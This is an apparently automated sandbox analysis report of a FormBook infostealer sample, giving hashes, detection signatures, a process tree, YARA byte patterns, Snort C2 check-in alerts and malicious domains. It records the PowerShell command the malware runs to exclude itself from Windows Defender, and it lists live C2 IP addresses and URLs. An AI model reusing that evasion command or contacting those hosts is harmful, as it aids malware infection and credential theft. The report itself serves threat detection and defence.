Windows Analysis Report
rPRESUPUESTO.exe

Overview

General Information

Sample name: rPRESUPUESTO.exe
Analysis ID: 1465409
MD5: e78d43a26913cf101b98d1d04839eee2
SHA1: 911c8c10f7c8bc9fd3c6bd16e9f5da11e3c3eb5d
SHA256: 8f9dbdd77e130b7238761966a9c9aa8712baf2100ddebc3d9d206ee17f8f119c
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • rPRESUPUESTO.exe (PID: 3180 cmdline: "C:\Users\user\Desktop\rPRESUPUESTO.exe" MD5: E78D43A26913CF101B98D1D04839EEE2)
    • powershell.exe (PID: 7092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1272 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • rPRESUPUESTO.exe (PID: 5144 cmdline: "C:\Users\user\Desktop\rPRESUPUESTO.exe" MD5: E78D43A26913CF101B98D1D04839EEE2)
      • MqDMLUHvZmSMqiwTfIsHo.exe (PID: 5908 cmdline: "C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ktmutil.exe (PID: 6608 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
          • MqDMLUHvZmSMqiwTfIsHo.exe (PID: 3608 cmdline: "C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4268 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ace0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x143ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x37a22:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x21141:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
5.2.rPRESUPUESTO.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.rPRESUPUESTO.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d373:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16a92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.rPRESUPUESTO.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.rPRESUPUESTO.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e173:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17892:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPRESUPUESTO.exe", ParentImage: C:\Users\user\Desktop\rPRESUPUESTO.exe, ParentProcessId: 3180, ParentProcessName: rPRESUPUESTO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", ProcessId: 7092, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rPRESUPUESTO.exe", ParentImage: C:\Users\user\Desktop\rPRESUPUESTO.exe, ParentProcessId: 3180, ParentProcessName: rPRESUPUESTO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPRESUPUESTO.exe", ProcessId: 7092, ProcessName: powershell.exe

            AV Detection

            Source: http://www.genesiestudios.online/s29p/, Avira URL Cloud: Label: malware
            Source: http://www.genesiestudios.online, Avira URL Cloud: Label: malware
            Source: http://www.gsdaluan.shop/8urb/, Avira URL Cloud: Label: malware
            Source: rPRESUPUESTO.exe, ReversingLabs: Detection: 68%
            Source: Yara match, File source: 5.2.rPRESUPUESTO.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 5.2.rPRESUPUESTO.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000005.00000002.2328576677.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.4590404042.0000000005560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.4588343221.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.4588414444.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.2328137343.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: rPRESUPUESTO.exe, Joe Sandbox ML: detected
            Source: rPRESUPUESTO.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: rPRESUPUESTO.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000000.2251157795.000000000098E000.00000002.00000001.01000000.0000000D.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000000.2398762392.000000000098E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: gESw.pdb source: rPRESUPUESTO.exe
            Source: Binary string: wntdll.pdbUGP source: rPRESUPUESTO.exe, 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2330777913.0000000002976000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2328626906.00000000027CA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: gESw.pdbSHA256 source: rPRESUPUESTO.exe
            Source: Binary string: wntdll.pdb source: rPRESUPUESTO.exe, rPRESUPUESTO.exe, 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000009.00000003.2330777913.0000000002976000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002CBE000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4588745880.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000003.2328626906.00000000027CA000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdbGCTL source: rPRESUPUESTO.exe, 00000005.00000002.2328360185.0000000001347000.00000004.00000020.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587226649.0000000001028000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdb source: rPRESUPUESTO.exe, 00000005.00000002.2328360185.0000000001347000.00000004.00000020.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 00000008.00000002.4587226649.0000000001028000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0019C0E0 FindFirstFileW,FindNextFileW,FindClose,9_2_0019C0E0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then xor eax, eax9_2_00189780
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then mov ebx, 00000004h9_2_02A10548

            Networking

            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49722 -> 122.10.13.122:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49727 -> 109.123.121.243:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49728 -> 109.123.121.243:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49731 -> 109.123.121.243:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49733 -> 47.242.109.15:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49734 -> 47.242.109.15:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49737 -> 47.242.109.15:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49739 -> 121.254.178.238:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49740 -> 121.254.178.238:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49742 -> 121.254.178.238:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49743 -> 203.161.62.199:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49744 -> 203.161.62.199:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49746 -> 203.161.62.199:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49747 -> 74.208.236.72:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49748 -> 74.208.236.72:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49750 -> 74.208.236.72:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49751 -> 192.207.62.21:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49752 -> 192.207.62.21:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49754 -> 192.207.62.21:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49755 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49756 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49758 -> 199.59.243.226:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49759 -> 45.207.12.95:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49760 -> 45.207.12.95:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49762 -> 45.207.12.95:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49763 -> 81.95.96.29:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49764 -> 81.95.96.29:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49766 -> 81.95.96.29:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49767 -> 103.224.182.246:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49768 -> 103.224.182.246:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49770 -> 103.224.182.246:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49771 -> 72.52.179.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49772 -> 72.52.179.174:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49774 -> 72.52.179.174:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49775 -> 192.227.175.142:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49776 -> 192.227.175.142:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49778 -> 192.227.175.142:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49779 -> 31.186.11.254:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49780 -> 31.186.11.254:80
            Source: DNS query: www.quantumvoil.xyz
            Source: Joe Sandbox ViewIP Address: 192.207.62.21 192.207.62.21
            Source: Joe Sandbox ViewIP Address: 72.52.179.174 72.52.179.174
            Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR
            Source: Joe Sandbox ViewASN Name: HOSTBREWUS HOSTBREWUS
            Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 14:18:21 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4981Connection: closeContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 14:18:24 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4981Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5c cd 73 1b b7 92 3f 2b 55 f9 1f 10 ba 1c 59 b5 02 bf f4 2d 4b ca 73 6c e5 3d af e3 8f 8d bc 49 6d 2e 2e cc 0c 48 42 9c 01 e6 01 33 14 c9 3c df 77 ab d6 f7 cd fa b2 3a fa a0 ca 61 6f af ea e5 42 e9 ff da 06 30 43 ce 0c 87 12 a9 8f ac f3 e1 84 d4 0c 06 e8 6e 00 dd bf ee 06 c0 d9 eb 44 81 7f f0 e9 27 9f 7e b2 d7 a1 c4 83 ab a5 3d 87 28 8a 3a 92 b6 f6 2b b5 8a 29 09 68 44 90 db 21 52 d1 68 bf 12 47 2d bc 5d 31 8d 96 f6 22 16 f9 f4 e0 d1 e3 d7 4f bf 3d 44 cd f5 55 a4 aa b2 2a aa 7b 35 fb c0 56 32 ed 39 09 e8 7e a5 c7 e8 49 28 64 54 41 ae e0 11 e5 40 ef 84 79 51 67 df a3 3d e6 52 6c 6e 56 11 e3 2c 62 c4 c7 ca 25 3e dd 6f 64 c4 b0 64 9e d1 c1 89 90 9e ca 90 99 aa f3 84 2a 57 b2 30 62 82 67 aa 4d 89 3a d5 ee 51 1c 75 84 5c a8 c9 cb 13 4e 2f 6d 81 d2 f1 fa 0c 63 d4 22 d0 55 c1 91 8a 88 8c 10 c6 86 9a cf 78 17 49 ea ef 57 48 18 fa 14 47 22 76 3b 58 d7 ab 20 c5 86 54 ed 57 36 b6 fa 1b 5b 95 64 6a 3a 51 14 aa dd 5a ad 1d b3 2a 71 23 d6 a3 cd f5 aa 3b ac b1 a0 5d d3 ad 6a a4 b9 8e 2d a9 84 1f 36 ed ab 21 6f 57 e6 e5 b8 59 ef 6f d6 6f c0 d1 b4 5f 88 e3 56 b3 bf d5 bc 01 47 d3 7e 31 8e 9b fd ad cd 9b 70 d4 ed 17 e2 d8 68 ac f7 e1 73 03 9e 09 85 c5 b8 36 eb 7d f8 dc 84 ab a5 b0 18 d7 75 90 74 fd 46 7d b5 14 16 e3 ba d1 ec c3 e7 26 5c 2d 85 c5 b8 6e c3 f8 6c df 68 84 2d 85 32 ae 96 53 34 08 01 6e 58 40 da b4 a6 2b 8d 59 ef 80 b8 3b 8b 75 78 cc d4 b6 5d 9c e9 5a b3 bf 76 3d 96 a6 e5 e2 0c 77 36 fb 3b 8b 99 6a ca d0 b4 bc c6 b0 6e f6 1b d7 63 68 5a 4e 18 66 7c 45 a0 f4 9c 33 97 68 c7 84 5f 33 9f 3e 16 7e ce df dc 6b 99 7f 73 b4 7c aa 25 ce b4 9c 4b c4 40 e1 72 c3 ca b0 8a 3a 34 a0 d8 bd 4c b0 c9 18 aa 68 e0 53 d5 a1 34 ba 6a a8 7c e6 48 22 07 35 43 be d6 09 1b 9b 35 d3 b8 ea 2a 35 3f d5 09 45 11 d4 a0 a5 
0b dd 6a d4 02 c2 78 15 5a a8 2f 7a fb 5b de 36 5d 6b d6 b7 d6 b7 5a 9b 5b f5 8d 0d b7 41 1a f5 fa 76 cb 71 d7 eb 5e dd 6d 5c c6 cb ea 42 44 fb 91 a6 9d f2 ae 01 fd be eb f1 aa 23 44 a4 22 49 42 7d a3 05 68 c1 e8 60 72 42 95 80 2e ad 57 d7 aa 75 dd 2e 57 5c 0d 40 34 4d 0c b8 2e 05 d4 63 04 50 c4 f7 8d 14 08 2d 24 c7 ac 91 d5 2c 7d c2 3d c6 db e9 60 ea 2e 1a 82 9a cd d2 9f 58 a0 e3 2e 14 4b ff 41 4a 44 cb a8 aa 6d 21 da 3e 25 21 53 e9 80 7e d1 22 01 f3 07 fb af 21 08 f3 7d 16 07 ff f4 1d 75 76 d7 eb f5 d5 2d f8 ec c0 67 13 3e 6b f5 fa e7 2a 76 74 4c e8 83 4a f2 55 f3 8d 41 e0 95 87 86 fb d2 9f cc 20 b4 88 4b d1 0f fa 7e 29 b9 d7 c4 77 d1 72 2a bf 51 47 b5 fc d0 54 51 d2 dd 35 42 2e cf ea aa 26 52 cb b7 ad 52 11 2d af a0 96 90 01 89 1e 2c d3 c0 a1 9e 47 3d 2c 42 d0 5b 18 c7 e5 95 55 43 7c 69 61 c2 51 d4 ca 10 8e 64 4c 6f 46 ef 44 b4 b2 04 ed ed 75 89 a9 5e 3b 43 cb dc 3d 9c 8c f3 09 65 ed 4e b4 8b b8 7e ee 67 1e 18 a5 c8 95 bf b5 f3 a5 93 01 23 8b 23 bc 41 d9 94 55 c6 1a 81 40 23 2a 96 a6 e8 51 d9 f2 c5 09 ee ef a2 0e 83 71 e7 59
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 14:18:26 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4981Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5c cd 73 1b b7 92 3f 2b 55 f9 1f 10 ba 1c 59 b5 02 bf f4 2d 4b ca 73 6c e5 3d af e3 8f 8d bc 49 6d 2e 2e cc 0c 48 42 9c 01 e6 01 33 14 c9 3c df 77 ab d6 f7 cd fa b2 3a fa a0 ca 61 6f af ea e5 42 e9 ff da 06 30 43 ce 0c 87 12 a9 8f ac f3 e1 84 d4 0c 06 e8 6e 00 dd bf ee 06 c0 d9 eb 44 81 7f f0 e9 27 9f 7e b2 d7 a1 c4 83 ab a5 3d 87 28 8a 3a 92 b6 f6 2b b5 8a 29 09 68 44 90 db 21 52 d1 68 bf 12 47 2d bc 5d 31 8d 96 f6 22 16 f9 f4 e0 d1 e3 d7 4f bf 3d 44 cd f5 55 a4 aa b2 2a aa 7b 35 fb c0 56 32 ed 39 09 e8 7e a5 c7 e8 49 28 64 54 41 ae e0 11 e5 40 ef 84 79 51 67 df a3 3d e6 52 6c 6e 56 11 e3 2c 62 c4 c7 ca 25 3e dd 6f 64 c4 b0 64 9e d1 c1 89 90 9e ca 90 99 aa f3 84 2a 57 b2 30 62 82 67 aa 4d 89 3a d5 ee 51 1c 75 84 5c a8 c9 cb 13 4e 2f 6d 81 d2 f1 fa 0c 63 d4 22 d0 55 c1 91 8a 88 8c 10 c6 86 9a cf 78 17 49 ea ef 57 48 18 fa 14 47 22 76 3b 58 d7 ab 20 c5 86 54 ed 57 36 b6 fa 1b 5b 95 64 6a 3a 51 14 aa dd 5a ad 1d b3 2a 71 23 d6 a3 cd f5 aa 3b ac b1 a0 5d d3 ad 6a a4 b9 8e 2d a9 84 1f 36 ed ab 21 6f 57 e6 e5 b8 59 ef 6f d6 6f c0 d1 b4 5f 88 e3 56 b3 bf d5 bc 01 47 d3 7e 31 8e 9b fd ad cd 9b 70 d4 ed 17 e2 d8 68 ac f7 e1 73 03 9e 09 85 c5 b8 36 eb 7d f8 dc 84 ab a5 b0 18 d7 75 90 74 fd 46 7d b5 14 16 e3 ba d1 ec c3 e7 26 5c 2d 85 c5 b8 6e c3 f8 6c df 68 84 2d 85 32 ae 96 53 34 08 01 6e 58 40 da b4 a6 2b 8d 59 ef 80 b8 3b 8b 75 78 cc d4 b6 5d 9c e9 5a b3 bf 76 3d 96 a6 e5 e2 0c 77 36 fb 3b 8b 99 6a ca d0 b4 bc c6 b0 6e f6 1b d7 63 68 5a 4e 18 66 7c 45 a0 f4 9c 33 97 68 c7 84 5f 33 9f 3e 16 7e ce df dc 6b 99 7f 73 b4 7c aa 25 ce b4 9c 4b c4 40 e1 72 c3 ca b0 8a 3a 34 a0 d8 bd 4c b0 c9 18 aa 68 e0 53 d5 a1 34 ba 6a a8 7c e6 48 22 07 35 43 be d6 09 1b 9b 35 d3 b8 ea 2a 35 3f d5 09 45 11 d4 a0 a5 
0b dd 6a d4 02 c2 78 15 5a a8 2f 7a fb 5b de 36 5d 6b d6 b7 d6 b7 5a 9b 5b f5 8d 0d b7 41 1a f5 fa 76 cb 71 d7 eb 5e dd 6d 5c c6 cb ea 42 44 fb 91 a6 9d f2 ae 01 fd be eb f1 aa 23 44 a4 22 49 42 7d a3 05 68 c1 e8 60 72 42 95 80 2e ad 57 d7 aa 75 dd 2e 57 5c 0d 40 34 4d 0c b8 2e 05 d4 63 04 50 c4 f7 8d 14 08 2d 24 c7 ac 91 d5 2c 7d c2 3d c6 db e9 60 ea 2e 1a 82 9a cd d2 9f 58 a0 e3 2e 14 4b ff 41 4a 44 cb a8 aa 6d 21 da 3e 25 21 53 e9 80 7e d1 22 01 f3 07 fb af 21 08 f3 7d 16 07 ff f4 1d 75 76 d7 eb f5 d5 2d f8 ec c0 67 13 3e 6b f5 fa e7 2a 76 74 4c e8 83 4a f2 55 f3 8d 41 e0 95 87 86 fb d2 9f cc 20 b4 88 4b d1 0f fa 7e 29 b9 d7 c4 77 d1 72 2a bf 51 47 b5 fc d0 54 51 d2 dd 35 42 2e cf ea aa 26 52 cb b7 ad 52 11 2d af a0 96 90 01 89 1e 2c d3 c0 a1 9e 47 3d 2c 42 d0 5b 18 c7 e5 95 55 43 7c 69 61 c2 51 d4 ca 10 8e 64 4c 6f 46 ef 44 b4 b2 04 ed ed 75 89 a9 5e 3b 43 cb dc 3d 9c 8c f3 09 65 ed 4e b4 8b b8 7e ee 67 1e 18 a5 c8 95 bf b5 f3 a5 93 01 23 8b 23 bc 41 d9 94 55 c6 1a 81 40 23 2a 96 a6 e8 51 d9 f2 c5 09 ee ef a2 0e 83 71 e7 59
